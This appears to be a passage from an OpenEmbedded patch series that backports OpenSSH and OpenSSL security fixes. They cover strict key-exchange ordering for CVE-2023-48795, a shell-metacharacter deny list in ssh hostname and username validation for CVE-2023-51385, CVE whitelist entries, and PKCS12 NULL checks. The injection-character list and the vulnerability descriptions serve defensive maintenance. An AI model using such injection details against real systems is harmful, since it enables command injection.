154 return SSH_ERR_INTERNAL_ERROR;
155 }
156- ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, NULL);
157+ ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, &kex_protocol_error);
158 ptr = sshpkt_ptr(ssh, &dlen);
159 if ((r = sshbuf_put(kex->peer, ptr, dlen)) != 0)
160 return r;
161@@ -617,7 +637,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
162 if (!(kex->flags & KEX_INIT_SENT))
163 if ((r = kex_send_kexinit(ssh)) != 0)
164 return r;
165- if ((r = kex_choose_conf(ssh)) != 0)
166+ if ((r = kex_choose_conf(ssh, seq)) != 0)
167 return r;
168
169 if (kex->kex_type < KEX_MAX && kex->kex[kex->kex_type] != NULL)
170@@ -880,7 +900,13 @@ proposals_match(char *my[PROPOSAL_MAX], char *peer[PROPOSAL_MAX])
171 }
172
173 static int
174-kex_choose_conf(struct ssh *ssh)
175+kexalgs_contains(char **peer, const char *ext)
176+{
177+ return has_any_alg(peer[PROPOSAL_KEX_ALGS], ext);
178+}
179+
180+static int
181+kex_choose_conf(struct ssh *ssh, uint32_t seq)
182 {
183 struct kex *kex = ssh->kex;
184 struct newkeys *newkeys;
185@@ -905,13 +931,23 @@ kex_choose_conf(struct ssh *ssh)
186 sprop=peer;
187 }
188
189- /* Check whether client supports ext_info_c */
190- if (kex->server && (kex->flags & KEX_INITIAL)) {
191- char *ext;
192-
193- ext = match_list("ext-info-c", peer[PROPOSAL_KEX_ALGS], NULL);
194- kex->ext_info_c = (ext != NULL);
195- free(ext);
196+ /* Check whether peer supports ext_info/kex_strict */
197+ if ((kex->flags & KEX_INITIAL) != 0) {
198+ if (kex->server) {
199+ kex->ext_info_c = kexalgs_contains(peer, "ext-info-c");
200+ kex->kex_strict = kexalgs_contains(peer,
201+ "kex-strict-c-v00@openssh.com");
202+ } else {
203+ kex->kex_strict = kexalgs_contains(peer,
204+ "kex-strict-s-v00@openssh.com");
205+ }
206+ if (kex->kex_strict) {
207+ debug3("will use strict KEX ordering");
208+ if (seq != 0)
209+ ssh_packet_disconnect(ssh,
210+ "strict KEX violation: "
211+ "KEXINIT was not the first packet");
212+ }
213 }
214
215 /* Algorithm Negotiation */
216diff --git a/kex.h b/kex.h
217index a5ae6ac..cae38f7 100644
218--- a/kex.h
219+++ b/kex.h
220@@ -145,6 +145,7 @@ struct kex {
221 u_int kex_type;
222 char *server_sig_algs;
223 int ext_info_c;
224+ int kex_strict;
225 struct sshbuf *my;
226 struct sshbuf *peer;
227 struct sshbuf *client_version;
228diff --git a/packet.c b/packet.c
229index 6d3e917..43139f9 100644
230--- a/packet.c
231+++ b/packet.c
232@@ -1203,8 +1203,13 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
233 sshbuf_dump(state->output, stderr);
234 #endif
235 /* increment sequence number for outgoing packets */
236- if (++state->p_send.seqnr == 0)
237+ if (++state->p_send.seqnr == 0) {
238+ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
239+ ssh_packet_disconnect(ssh, "outgoing sequence number "
240+ "wrapped during initial key exchange");
241+ }
242 logit("outgoing seqnr wraps around");
243+ }
244 if (++state->p_send.packets == 0)
245 if (!(ssh->compat & SSH_BUG_NOREKEY))
246 return SSH_ERR_NEED_REKEY;
247@@ -1212,6 +1217,11 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
248 state->p_send.bytes += len;
249 sshbuf_reset(state->outgoing_packet);
250
251+ if (type == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
252+ debug("resetting send seqnr %u", state->p_send.seqnr);
253+ state->p_send.seqnr = 0;
254+ }
255+
256 if (type == SSH2_MSG_NEWKEYS)
257 r = ssh_set_newkeys(ssh, MODE_OUT);
258 else if (type == SSH2_MSG_USERAUTH_SUCCESS && state->server_side)
259@@ -1345,8 +1355,7 @@ ssh_packet_read_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
260 /* Stay in the loop until we have received a complete packet. */
261 for (;;) {
262 /* Try to read a packet from the buffer. */
263- r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p);
264- if (r != 0)
265+ if ((r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p)) != 0)
266 break;
267 /* If we got a packet, return it. */
268 if (*typep != SSH_MSG_NONE)
269@@ -1633,10 +1642,16 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
270 if ((r = sshbuf_consume(state->input, mac->mac_len)) != 0)
271 goto out;
272 }
273+
274 if (seqnr_p != NULL)
275 *seqnr_p = state->p_read.seqnr;
276- if (++state->p_read.seqnr == 0)
277+ if (++state->p_read.seqnr == 0) {
278+ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
279+ ssh_packet_disconnect(ssh, "incoming sequence number "
280+ "wrapped during initial key exchange");
281+ }
282 logit("incoming seqnr wraps around");
283+ }
284 if (++state->p_read.packets == 0)
285 if (!(ssh->compat & SSH_BUG_NOREKEY))
286 return SSH_ERR_NEED_REKEY;
287@@ -1702,6 +1717,10 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
288 #endif
289 /* reset for next packet */
290 state->packlen = 0;
291+ if (*typep == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
292+ debug("resetting read seqnr %u", state->p_read.seqnr);
293+ state->p_read.seqnr = 0;
294+ }
295
296 /* do we need to rekey? */
297 if (ssh_packet_need_rekeying(ssh, 0)) {
298@@ -1726,10 +1745,39 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
299 r = ssh_packet_read_poll2(ssh, typep, seqnr_p);
300 if (r != 0)
301 return r;
302- if (*typep) {
303- state->keep_alive_timeouts = 0;
304- DBG(debug("received packet type %d", *typep));
305+ if (*typep == 0) {
306+ /* no message ready */
307+ return 0;
308+ }
309+ state->keep_alive_timeouts = 0;
310+ DBG(debug("received packet type %d", *typep));
311+
312+ /* Always process disconnect messages */
313+ if (*typep == SSH2_MSG_DISCONNECT) {
314+ if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
315+ (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
316+ return r;
317+ /* Ignore normal client exit notifications */
318+ do_log2(ssh->state->server_side &&
319+ reason == SSH2_DISCONNECT_BY_APPLICATION ?
320+ SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
321+ "Received disconnect from %s port %d:"
322+ "%u: %.400s", ssh_remote_ipaddr(ssh),
323+ ssh_remote_port(ssh), reason, msg);
324+ free(msg);
325+ return SSH_ERR_DISCONNECTED;
326 }
327+
328+ /*
329+ * Do not implicitly handle any messages here during initial
330+ * KEX when in strict mode. They will be need to be allowed
331+ * explicitly by the KEX dispatch table or they will generate
332+ * protocol errors.
333+ */
334+ if (ssh->kex != NULL &&
335+ (ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict)
336+ return 0;
337+ /* Implicitly handle transport-level messages */
338 switch (*typep) {
339 case SSH2_MSG_IGNORE:
340 debug3("Received SSH2_MSG_IGNORE");
341@@ -1744,19 +1792,6 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
342 debug("Remote: %.900s", msg);
343 free(msg);
344 break;
345- case SSH2_MSG_DISCONNECT:
346- if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
347- (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
348- return r;
349- /* Ignore normal client exit notifications */
350- do_log2(ssh->state->server_side &&
351- reason == SSH2_DISCONNECT_BY_APPLICATION ?
352- SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
353- "Received disconnect from %s port %d:"
354- "%u: %.400s", ssh_remote_ipaddr(ssh),
355- ssh_remote_port(ssh), reason, msg);
356- free(msg);
357- return SSH_ERR_DISCONNECTED;
358 case SSH2_MSG_UNIMPLEMENTED:
359 if ((r = sshpkt_get_u32(ssh, &seqnr)) != 0)
360 return r;
361@@ -2235,6 +2270,7 @@ kex_to_blob(struct sshbuf *m, struct kex *kex)
362 (r = sshbuf_put_u32(m, kex->hostkey_type)) != 0 ||
363 (r = sshbuf_put_u32(m, kex->hostkey_nid)) != 0 ||
364 (r = sshbuf_put_u32(m, kex->kex_type)) != 0 ||
365+ (r = sshbuf_put_u32(m, kex->kex_strict)) != 0 ||
366 (r = sshbuf_put_stringb(m, kex->my)) != 0 ||
367 (r = sshbuf_put_stringb(m, kex->peer)) != 0 ||
368 (r = sshbuf_put_stringb(m, kex->client_version)) != 0 ||
369@@ -2397,6 +2433,7 @@ kex_from_blob(struct sshbuf *m, struct kex **kexp)
370 (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_type)) != 0 ||
371 (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_nid)) != 0 ||
372 (r = sshbuf_get_u32(m, &kex->kex_type)) != 0 ||
373+ (r = sshbuf_get_u32(m, &kex->kex_strict)) != 0 ||
374 (r = sshbuf_get_stringb(m, kex->my)) != 0 ||
375 (r = sshbuf_get_stringb(m, kex->peer)) != 0 ||
376 (r = sshbuf_get_stringb(m, kex->client_version)) != 0 ||
377@@ -2724,6 +2761,7 @@ sshpkt_disconnect(struct ssh *ssh, const char *fmt,...)
378 vsnprintf(buf, sizeof(buf), fmt, args);
379 va_end(args);
380
381+ debug2("sending SSH2_MSG_DISCONNECT: %s", buf);
382 if ((r = sshpkt_start(ssh, SSH2_MSG_DISCONNECT)) != 0 ||
383 (r = sshpkt_put_u32(ssh, SSH2_DISCONNECT_PROTOCOL_ERROR)) != 0 ||
384 (r = sshpkt_put_cstring(ssh, buf)) != 0 ||
385diff --git a/sshconnect2.c b/sshconnect2.c
386index 5df9477..617ed9f 100644
387--- a/sshconnect2.c
388+++ b/sshconnect2.c
389@@ -218,7 +218,8 @@ ssh_kex2(struct ssh *ssh, char *host, struct sockaddr *hostaddr, u_short port)
390 fatal("%s: kex_assemble_namelist", __func__);
391 free(all_key);
392
393- if ((s = kex_names_cat(options.kex_algorithms, "ext-info-c")) == NULL)
394+ if ((s = kex_names_cat(options.kex_algorithms,
395+ "ext-info-c,kex-strict-c-v00@openssh.com")) == NULL)
396 fatal("%s: kex_names_cat", __func__);
397 myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
398 myproposal[PROPOSAL_ENC_ALGS_CTOS] =
399@@ -343,7 +344,6 @@ struct cauthmethod {
400 };
401
402 static int input_userauth_service_accept(int, u_int32_t, struct ssh *);
403-static int input_userauth_ext_info(int, u_int32_t, struct ssh *);
404 static int input_userauth_success(int, u_int32_t, struct ssh *);
405 static int input_userauth_failure(int, u_int32_t, struct ssh *);
406 static int input_userauth_banner(int, u_int32_t, struct ssh *);
407@@ -460,7 +460,7 @@ ssh_userauth2(struct ssh *ssh, const char *local_user,
408
409 ssh->authctxt = &authctxt;
410 ssh_dispatch_init(ssh, &input_userauth_error);
411- ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &input_userauth_ext_info);
412+ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, kex_input_ext_info);
413 ssh_dispatch_set(ssh, SSH2_MSG_SERVICE_ACCEPT, &input_userauth_service_accept);
414 ssh_dispatch_run_fatal(ssh, DISPATCH_BLOCK, &authctxt.success); /* loop until success */
415 pubkey_cleanup(ssh);
416@@ -505,13 +505,6 @@ input_userauth_service_accept(int type, u_int32_t seq, struct ssh *ssh)
417 return r;
418 }
419
420-/* ARGSUSED */
421-static int
422-input_userauth_ext_info(int type, u_int32_t seqnr, struct ssh *ssh)
423-{
424- return kex_input_ext_info(type, seqnr, ssh);
425-}
426-
427 void
428 userauth(struct ssh *ssh, char *authlist)
429 {
430@@ -593,6 +586,7 @@ input_userauth_success(int type, u_int32_t seq, struct ssh *ssh)
431 free(authctxt->methoddata);
432 authctxt->methoddata = NULL;
433 authctxt->success = 1; /* break out */
434+ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, dispatch_protocol_error);
435 return 0;
436 }
437
438diff --git a/sshd.c b/sshd.c
439index 60b2aaf..ffea38c 100644
440--- a/sshd.c
441+++ b/sshd.c
442@@ -2323,11 +2323,13 @@ static void
443 do_ssh2_kex(struct ssh *ssh)
444 {
445 char *myproposal[PROPOSAL_MAX] = { KEX_SERVER };
446+ char *s;
447 struct kex *kex;
448 int r;
449
450- myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(
451- options.kex_algorithms);
452+ if ((s = kex_names_cat(options.kex_algorithms, "kex-strict-s-v00@openssh.com")) == NULL)
453+ fatal("kex_names_cat");
454+ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
455 myproposal[PROPOSAL_ENC_ALGS_CTOS] = compat_cipher_proposal(
456 options.ciphers);
457 myproposal[PROPOSAL_ENC_ALGS_STOC] = compat_cipher_proposal(
458@@ -2382,6 +2384,7 @@ do_ssh2_kex(struct ssh *ssh)
459 packet_send();
460 packet_write_wait();
461 #endif
462+ free(s);
463 debug("KEX done");
464 }
465
466--
4672.25.1
468
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
new file mode 100644
index 0000000000..0ba8c312d0
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
@@ -0,0 +1,95 @@
1From 7ef3787c84b6b524501211b11a26c742f829af1a Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Mon, 18 Dec 2023 14:47:44 +0000
4Subject: [PATCH] upstream: ban user/hostnames with most shell metacharacters
5
6This makes ssh(1) refuse user or host names provided on the
7commandline that contain most shell metacharacters.
8
9Some programs that invoke ssh(1) using untrusted data do not filter
10metacharacters in arguments they supply. This could create
11interactions with user-specified ProxyCommand and other directives
12that allow shell injection attacks to occur.
13
14It's a mistake to invoke ssh(1) with arbitrary untrusted arguments,
15but getting this stuff right can be tricky, so this should prevent
16most obvious ways of creating risky situations. It however is not
17and cannot be perfect: ssh(1) has no practical way of interpreting
18what shell quoting rules are in use and how they interact with the
19user's specified ProxyCommand.
20
21To allow configurations that use strange user or hostnames to
22continue to work, this strictness is applied only to names coming
23from the commandline. Names specified using User or Hostname
24directives in ssh_config(5) are not affected.
25
26feedback/ok millert@ markus@ dtucker@ deraadt@
27
28OpenBSD-Commit-ID: 3b487348b5964f3e77b6b4d3da4c3b439e94b2d9
29
30CVE: CVE-2023-51385
31Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a]
32Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
33Comment: Hunks refreshed to apply cleanly
34
35---
36 ssh.c | 41 ++++++++++++++++++++++++++++++++++++++++-
37 1 file changed, 40 insertions(+), 1 deletion(-)
38
39diff --git a/ssh.c b/ssh.c
40index 35c48e62d18..48d93ddf2a9 100644
41--- a/ssh.c
42+++ b/ssh.c
43@@ -583,6 +583,41 @@ set_addrinfo_port(struct addrinfo *addrs
44 }
45 }
46
47+static int
48+valid_hostname(const char *s)
49+{
50+ size_t i;
51+
52+ if (*s == '-')
53+ return 0;
54+ for (i = 0; s[i] != 0; i++) {
55+ if (strchr("'`\"$\\;&<>|(){}", s[i]) != NULL ||
56+ isspace((u_char)s[i]) || iscntrl((u_char)s[i]))
57+ return 0;
58+ }
59+ return 1;
60+}
61+
62+static int
63+valid_ruser(const char *s)
64+{
65+ size_t i;
66+
67+ if (*s == '-')
68+ return 0;
69+ for (i = 0; s[i] != 0; i++) {
70+ if (strchr("'`\";&<>|(){}", s[i]) != NULL)
71+ return 0;
72+ /* Disallow '-' after whitespace */
73+ if (isspace((u_char)s[i]) && s[i + 1] == '-')
74+ return 0;
75+ /* Disallow \ in last position */
76+ if (s[i] == '\\' && s[i + 1] == '\0')
77+ return 0;
78+ }
79+ return 1;
80+}
81+
82 /*
83 * Main program for the ssh client.
84 */
85@@ -1069,6 +1104,10 @@ main(int ac, char **av)
86 if (!host)
87 usage();
88
89+ if (!valid_hostname(host))
90+ fatal("hostname contains invalid characters");
91+ if (options.user != NULL && !valid_ruser(options.user))
92+ fatal("remote username contains invalid characters");
93 host_arg = xstrdup(host);
94
95 /* Initialize the command to execute on remote host. */
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd.socket b/meta/recipes-connectivity/openssh/openssh/sshd.socket
index 12c39b26b5..8d76d62309 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd.socket
+++ b/meta/recipes-connectivity/openssh/openssh/sshd.socket
@@ -1,5 +1,6 @@
1[Unit] 1[Unit]
2Conflicts=sshd.service 2Conflicts=sshd.service
3Wants=sshdgenkeys.service
3 4
4[Socket] 5[Socket]
5ExecStartPre=@BASE_BINDIR@/mkdir -p /var/run/sshd 6ExecStartPre=@BASE_BINDIR@/mkdir -p /var/run/sshd
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd@.service b/meta/recipes-connectivity/openssh/openssh/sshd@.service
index 9d83dfb2bb..422450c7a1 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd@.service
+++ b/meta/recipes-connectivity/openssh/openssh/sshd@.service
@@ -1,13 +1,11 @@
1[Unit] 1[Unit]
2Description=OpenSSH Per-Connection Daemon 2Description=OpenSSH Per-Connection Daemon
3Wants=sshdgenkeys.service
4After=sshdgenkeys.service 3After=sshdgenkeys.service
5 4
6[Service] 5[Service]
7Environment="SSHD_OPTS=" 6Environment="SSHD_OPTS="
8EnvironmentFile=-/etc/default/ssh 7EnvironmentFile=-/etc/default/ssh
9ExecStart=-@SBINDIR@/sshd -i $SSHD_OPTS 8ExecStart=-@SBINDIR@/sshd -i $SSHD_OPTS
10ExecReload=@BASE_BINDIR@/kill -HUP $MAINPID
11StandardInput=socket 9StandardInput=socket
12StandardError=syslog 10StandardError=syslog
13KillMode=process 11KillMode=process
diff --git a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
index fe94f30503..9d6cf7da6c 100644
--- a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
+++ b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
@@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \
5and for executing commands on a remote machine." 5and for executing commands on a remote machine."
6HOMEPAGE = "http://www.openssh.com/" 6HOMEPAGE = "http://www.openssh.com/"
7SECTION = "console/network" 7SECTION = "console/network"
8LICENSE = "BSD & ISC & MIT" 8LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT"
9LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3" 9LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3"
10 10
11DEPENDS = "zlib openssl virtual/crypt" 11DEPENDS = "zlib openssl virtual/crypt"
@@ -24,14 +24,63 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar
24 file://fix-potential-signed-overflow-in-pointer-arithmatic.patch \ 24 file://fix-potential-signed-overflow-in-pointer-arithmatic.patch \
25 file://sshd_check_keys \ 25 file://sshd_check_keys \
26 file://add-test-support-for-busybox.patch \ 26 file://add-test-support-for-busybox.patch \
27 file://CVE-2020-14145.patch \
28 file://CVE-2021-28041.patch \
29 file://CVE-2021-41617.patch \
30 file://CVE-2023-38408-01.patch \
31 file://CVE-2023-38408-02.patch \
32 file://CVE-2023-38408-03.patch \
33 file://CVE-2023-38408-04.patch \
34 file://CVE-2023-38408-05.patch \
35 file://CVE-2023-38408-06.patch \
36 file://CVE-2023-38408-07.patch \
37 file://CVE-2023-38408-08.patch \
38 file://CVE-2023-38408-09.patch \
39 file://CVE-2023-38408-10.patch \
40 file://CVE-2023-38408-11.patch \
41 file://CVE-2023-38408-12.patch \
42 file://CVE-2023-48795.patch \
43 file://CVE-2023-51385.patch \
27 " 44 "
28SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091" 45SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091"
29SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671" 46SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671"
30 47
48# This CVE is specific to OpenSSH with the pam opie which we don't build/use here
49CVE_CHECK_WHITELIST += "CVE-2007-2768"
50
31# This CVE is specific to OpenSSH server, as used in Fedora and Red Hat Enterprise Linux 7 51# This CVE is specific to OpenSSH server, as used in Fedora and Red Hat Enterprise Linux 7
32# and when running in a Kerberos environment. As such it is not relevant to OpenEmbedded 52# and when running in a Kerberos environment. As such it is not relevant to OpenEmbedded
33CVE_CHECK_WHITELIST += "CVE-2014-9278" 53CVE_CHECK_WHITELIST += "CVE-2014-9278"
34 54
55# As per upstream, because of the way scp is based on a historical protocol called rcp
56# which relies on that style of argument passing and therefore encounters expansion
57# problems. Making changes to how the scp command line works breaks the pattern used
58# by scp consumers. Upstream therefore recommends the use of rsync in the place of
59# scp for better security. https://bugzilla.redhat.com/show_bug.cgi?id=1860487
60CVE_CHECK_WHITELIST += "CVE-2020-15778"
61
62# CVE-2008-3844 was reported in OpenSSH on Red Hat Enterprise Linux and
63# certain packages may have been compromised. This CVE is not applicable
64# as our source is OpenBSD. https://securitytracker.com/id?1020730
65# https://www.securityfocus.com/bid/30794
66CVE_CHECK_WHITELIST += "CVE-2008-3844"
67
68# openssh-ssh1 is provided for compatibility with old devices that
69# cannot be upgraded to modern protocols. Thus they may not provide security
70# support for this package because doing so would prevent access to equipment.
71# The upstream OpenSSH developers see this as an important
72# security feature and do not intend to 'fix' it.
73# https://security-tracker.debian.org/tracker/CVE-2016-20012
74# https://ubuntu.com/security/CVE-2016-20012
75CVE_CHECK_WHITELIST += "CVE-2016-20012"
76
77# As per debian, the issue is fixed by a feature called "agent restriction" in openssh 8.9
78# Urgency is unimportant as per debian, Hence this CVE is whitelisting.
79# https://security-tracker.debian.org/tracker/CVE-2021-36368
80# https://bugzilla.mindrot.org/show_bug.cgi?id=3316#c2
81# https://docs.ssh-mitm.at/trivialauth.html
82CVE_CHECK_WHITELIST += "CVE-2021-36368"
83
35PAM_SRC_URI = "file://sshd" 84PAM_SRC_URI = "file://sshd"
36 85
37inherit manpages useradd update-rc.d update-alternatives systemd 86inherit manpages useradd update-rc.d update-alternatives systemd
@@ -155,12 +204,17 @@ FILES_${PN}-sftp-server = "${libexecdir}/sftp-server"
155FILES_${PN}-misc = "${bindir}/ssh* ${libexecdir}/ssh*" 204FILES_${PN}-misc = "${bindir}/ssh* ${libexecdir}/ssh*"
156FILES_${PN}-keygen = "${bindir}/ssh-keygen" 205FILES_${PN}-keygen = "${bindir}/ssh-keygen"
157 206
158RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen" 207RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen ${PN}-sftp-server"
159RDEPENDS_${PN}-sshd += "${PN}-keygen ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-keyinit pam-plugin-loginuid', '', d)}" 208RDEPENDS_${PN}-sshd += "${PN}-keygen ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-keyinit pam-plugin-loginuid', '', d)}"
160RRECOMMENDS_${PN}-sshd_append_class-target = "\ 209RRECOMMENDS_${PN}-sshd_append_class-target = "\
161 ${@bb.utils.filter('PACKAGECONFIG', 'rng-tools', d)} \ 210 ${@bb.utils.filter('PACKAGECONFIG', 'rng-tools', d)} \
162" 211"
163 212
213# break dependency on base package for -dev package
214# otherwise SDK fails to build as the main openssh and dropbear packages
215# conflict with each other
216RDEPENDS:${PN}-dev = ""
217
164# gdb would make attach-ptrace test pass rather than skip but not worth the build dependencies 218# gdb would make attach-ptrace test pass rather than skip but not worth the build dependencies
165RDEPENDS_${PN}-ptest += "${PN}-sftp ${PN}-misc ${PN}-sftp-server make sed sudo coreutils" 219RDEPENDS_${PN}-ptest += "${PN}-sftp ${PN}-misc ${PN}-sftp-server make sed sudo coreutils"
166 220
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
new file mode 100644
index 0000000000..e2a65d0998
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
@@ -0,0 +1,38 @@
1From 679ae2f72ef8cf37609cb0eff5de3b98aa85e395 Mon Sep 17 00:00:00 2001
2From: Steve Sakoman <steve@sakoman.com>
3Date: Thu, 20 Jul 2023 04:14:42 -1000
4Subject: [PATCH] Configure: add 2 missing key sorts in generation of unified_info
5
6Otherwise generation of this section in configdata.pm is not reproducible
7
8Signed-off-by: Steve Sakoman <steve@sakoman.com>
9Upstream-Status: Backport [adapted from 3.x commit https://github.com/openssl/openssl/commit/764cf5b26306a8712e8b3d41599c44dc5ed07a25]
10---
11 Configure | 4 ++--
12 1 file changed, 2 insertions(+), 2 deletions(-)
13
14diff --git a/Configure b/Configure
15index 2a01746..8fc5a2c 100755
16--- a/Configure
17+++ b/Configure
18@@ -2326,7 +2326,7 @@ EOF
19 "dso" => [ @{$unified_info{engines}} ],
20 "bin" => [ @{$unified_info{programs}} ],
21 "script" => [ @{$unified_info{scripts}} ] );
22- foreach my $type (keys %loopinfo) {
23+ foreach my $type (sort keys %loopinfo) {
24 foreach my $product (@{$loopinfo{$type}}) {
25 my %dirs = ();
26 my $pd = dirname($product);
27@@ -2347,7 +2347,7 @@ EOF
28 push @{$unified_info{dirinfo}->{$d}->{deps}}, $_
29 if $d ne $pd;
30 }
31- foreach (keys %dirs) {
32+ foreach (sort keys %dirs) {
33 push @{$unified_info{dirinfo}->{$_}->{products}->{$type}},
34 $product;
35 }
36--
372.34.1
38
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
new file mode 100644
index 0000000000..b3f6a942d5
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
@@ -0,0 +1,37 @@
1From 326909baf81a638d51fa8be1d8227518784f5cc4 Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex@linutronix.de>
3Date: Tue, 14 Sep 2021 12:18:25 +0200
4Subject: [PATCH] Configure: do not tweak mips cflags
5
6This conflicts with mips machine definitons from yocto,
7e.g.
8| Error: -mips3 conflicts with the other architecture options, which imply -mips64r2
9
10Upstream-Status: Inappropriate [oe-core specific]
11Signed-off-by: Alexander Kanavin <alex@linutronix.de>
12Signed-off-by: Peter Marko <peter.marko@siemens.com>
13---
14 Configure | 10 ----------
15 1 file changed, 10 deletions(-)
16
17Index: openssl-3.0.4/Configure
18===================================================================
19--- openssl-3.0.4.orig/Configure
20+++ openssl-3.0.4/Configure
21@@ -1243,16 +1243,6 @@ if ($target =~ /^mingw/ && `$config{CC} --target-help 2>&1` =~ m/-mno-cygwin/m)
22 push @{$config{shared_ldflag}}, "-mno-cygwin";
23 }
24
25-if ($target =~ /linux.*-mips/ && !$disabled{asm}
26- && !grep { $_ =~ /-m(ips|arch=)/ } (@{$config{CFLAGS}})) {
27- # minimally required architecture flags for assembly modules
28- my $value;
29- $value = '-mips2' if ($target =~ /mips32/);
30- $value = '-mips3' if ($target =~ /mips64/);
31- unshift @{$config{cflags}}, $value;
32- unshift @{$config{cxxflags}}, $value if $config{CXX};
33-}
34-
35 # If threads aren't disabled, check how possible they are
36 unless ($disabled{threads}) {
37 if ($auto_threads) {
diff --git a/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
new file mode 100644
index 0000000000..3da6879ccb
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
@@ -0,0 +1,122 @@
1Backport of:
2
3From 09df4395b5071217b76dc7d3d2e630eb8c5a79c2 Mon Sep 17 00:00:00 2001
4From: Matt Caswell <matt@openssl.org>
5Date: Fri, 19 Jan 2024 11:28:58 +0000
6Subject: [PATCH] Add NULL checks where ContentInfo data can be NULL
7
8PKCS12 structures contain PKCS7 ContentInfo fields. These fields are
9optional and can be NULL even if the "type" is a valid value. OpenSSL
10was not properly accounting for this and a NULL dereference can occur
11causing a crash.
12
13CVE-2024-0727
14
15Reviewed-by: Tomas Mraz <tomas@openssl.org>
16Reviewed-by: Hugo Landau <hlandau@openssl.org>
17Reviewed-by: Neil Horman <nhorman@openssl.org>
18(Merged from https://github.com/openssl/openssl/pull/23362)
19
20(cherry picked from commit d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c)
21
22Upstream-Status: Backport [https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c]
23
24CVE: CVE-2024-0727
25
26Signed-off-by: virendra thakur <virendrak@kpit.com>
27---
28 crypto/pkcs12/p12_add.c | 18 ++++++++++++++++++
29 crypto/pkcs12/p12_mutl.c | 5 +++++
30 crypto/pkcs12/p12_npas.c | 5 +++--
31 crypto/pkcs7/pk7_mime.c | 7 +++++--
32 4 files changed, 31 insertions(+), 4 deletions(-)
33
34--- a/crypto/pkcs12/p12_add.c
35+++ b/crypto/pkcs12/p12_add.c
